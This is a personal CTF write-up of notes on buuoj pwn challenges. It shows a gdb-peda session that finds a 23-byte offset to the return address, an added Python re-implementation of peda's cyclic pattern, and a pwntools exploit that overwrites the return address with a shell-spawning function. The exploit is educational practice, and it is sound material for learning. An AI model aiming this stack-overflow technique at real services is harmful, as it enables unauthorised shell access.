buuoj pwn notes

I have recently started putting real effort into pwn. glzjin set up a CTF platform for his school, and the challenges on it are quite good, so I will take notes as I work through them.
Link: buuoj

The pwn where connecting is enough to get the flag

As the title says: connect with nc and the flag is printed.

Overwrite RIP

Loading the binary into IDA and disassembling it shows that this is a plain RIP overwrite.

The fun function already spawns a shell for us, so all that is needed is the offset to the return address.

Open the binary in gdb-peda; a few simple commands are enough to compute the offset.

root@kali:~# gdb ./pwn1
gdb-peda$ pattc 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
gdb-peda$ start
gdb-peda$ contin
Continuing.
please input
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
ok,bye!!!

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7ed7804 (<write+20>: cmp rax,0xfffffffffffff000)
RDX: 0x7ffff7faa8c0 --> 0x0
RSI: 0x405260 ("ok,bye!!!\nAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
RDI: 0x0
RBP: 0x412d41414341416e ('nAACAA-A')
RSP: 0x7fffffffe1a8 ("A(AADAA;AA)AAEAAaAA0AAFAAbA")
RIP: 0x401185 (<main+67>: ret)
R8 : 0x7ffff7faf500 (0x00007ffff7faf500)
R9 : 0x0
R10: 0x405010 --> 0x0
R11: 0x246
R12: 0x401060 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe280 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x40117a <main+56>: call 0x401030 <puts@plt>
0x40117f <main+61>: mov eax,0x0
0x401184 <main+66>: leave
=> 0x401185 <main+67>: ret
0x401186 <fun>: push rbp
0x401187 <fun+1>: mov rbp,rsp
0x40118a <fun+4>: lea rdi,[rip+0xe8a] # 0x40201b
0x401191 <fun+11>: call 0x401040 <system@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe1a8 ("A(AADAA;AA)AAEAAaAA0AAFAAbA")
0008| 0x7fffffffe1b0 ("AA)AAEAAaAA0AAFAAbA")
0016| 0x7fffffffe1b8 ("aAA0AAFAAbA")
0024| 0x7fffffffe1c0 --> 0x100416241
0032| 0x7fffffffe1c8 --> 0x401142 (<main>: push rbp)
0040| 0x7fffffffe1d0 --> 0x0
0048| 0x7fffffffe1d8 --> 0x3777803596990da
0056| 0x7fffffffe1e0 --> 0x401060 (<_start>: xor ebp,ebp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000401185 in main ()
gdb-peda$ pattern offset A(AADAA;AA)AAEAAaAA0AAFAAbA
A(AADAA;AA)AAEAAaAA0AAFAAbA found at offset: 23
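How peda arrives at 23, as an added example that is not part of the original post: a small re-implementation of gdb-peda's cyclic pattern (an order-3 De Bruijn sequence over its default "extended" charset) and of `pattern offset`. The function names `peda_charset`, `cyclic_pattern` and `pattern_offset` are my own; the charset layout and the generator follow peda's approach. It reproduces the 50-byte pattern from the session above, and looking up the RBP value ('nAACAA-A') as well as the RSP value shows the saved rbp at offset 15 and the return address at 23, i.e. 15 + 8 bytes of saved rbp.

```python
# Added example: reproduce gdb-peda's `pattc` / `pattern offset` in plain Python.
import string

def peda_charset() -> str:
    """peda's default ('extended') charset: three groups interleaved column by column."""
    upper = string.ascii_uppercase
    lower = "%$-;" + "".join(c for c in string.ascii_lowercase if c not in "sn")
    digits = "sn()" + string.digits
    mixed = ""
    for k in range(max(len(upper), len(lower), len(digits))):
        for group in (upper, lower, digits):
            mixed += group[k:k + 1]  # empty slice once a group runs out
    return mixed  # "A%sB$nC-(D;)Ea0Fb1..." (68 symbols)

def de_bruijn(charset: str, n: int, maxlen: int) -> str:
    """First maxlen symbols of the De Bruijn sequence B(len(charset), n):
    every n-gram occurs at most once, which is what makes an offset unambiguous."""
    k = len(charset)
    a = [0] * k * n
    out = []

    def db(t: int, p: int) -> None:
        if len(out) >= maxlen:
            return
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    out.append(charset[a[j]])
                    if len(out) >= maxlen:
                        return
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(out)

def cyclic_pattern(size: int) -> str:
    """Equivalent of peda's `pattc <size>`."""
    return de_bruijn(peda_charset(), 3, size)

def pattern_offset(value: str, size: int = 0x10000) -> int:
    """Equivalent of peda's `pattern offset <value>`; returns -1 if value is not in the pattern."""
    return cyclic_pattern(size).find(value)
```

Because the crash landed on `ret`, the value at RSP is the overwritten return address, so `pattern_offset("A(AADAA;AA)AAEAAaAA0AAFAAbA")` is the padding length the exp needs.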

With the offset known, a simple exp is enough to get the flag:

from pwn import *

p = remote("buuoj.cn", 6001)
pushadr = 0x401186                 # address of fun, which calls system() for us
# 23 bytes of padding reach the saved return address, then overwrite it with fun.
# Under Python 3 the padding must be bytes: 'a' * 23 + p64(...) raises TypeError.
payload = b'a' * 23 + p64(pushadr)
p.sendline(payload)
p.interactive()